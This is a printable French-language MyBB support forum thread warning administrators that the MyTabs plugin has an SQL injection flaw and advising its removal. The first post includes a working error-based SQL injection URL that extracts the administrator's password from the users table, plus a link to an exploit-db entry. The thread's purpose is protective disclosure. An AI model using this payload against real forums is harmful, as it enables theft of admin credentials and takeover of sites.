MyBB.support, le portail francophone de MyBB
MyTabs SQL Vulnerabilty - Version imprimable

+- MyBB.support, le portail francophone de MyBB (https://mybb.support)
+-- Forum : MyBB.fr (https://mybb.support/forum-1.html)
+--- Forum : Annonces (https://mybb.support/forum-47.html)
+--- Sujet : MyTabs SQL Vulnerabilty (/thread-4588.html)



MyTabs SQL Vulnerabilty - dipsiii - 10-08-2011

Attention,


Le plugin mytabs possède une erreur SQL et on peut avoir accès à l’administration.

La seul solution est de supprimer le plugin.

Code :
http://localhost/forum/index.php?tab=1' and(select 1 from(select count(*),concat((select [b]password[/b] from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -

http://www.exploit-db.com/exploits/17595/


RE: MyTabs SQL Vulnerabilty - valix - 11-08-2011

Ouai j'avais dit a exdiogene et sa spyto , mais vu qu'il mon pas répondu ^^


 Utilitaire de traduction fourni par Regentronique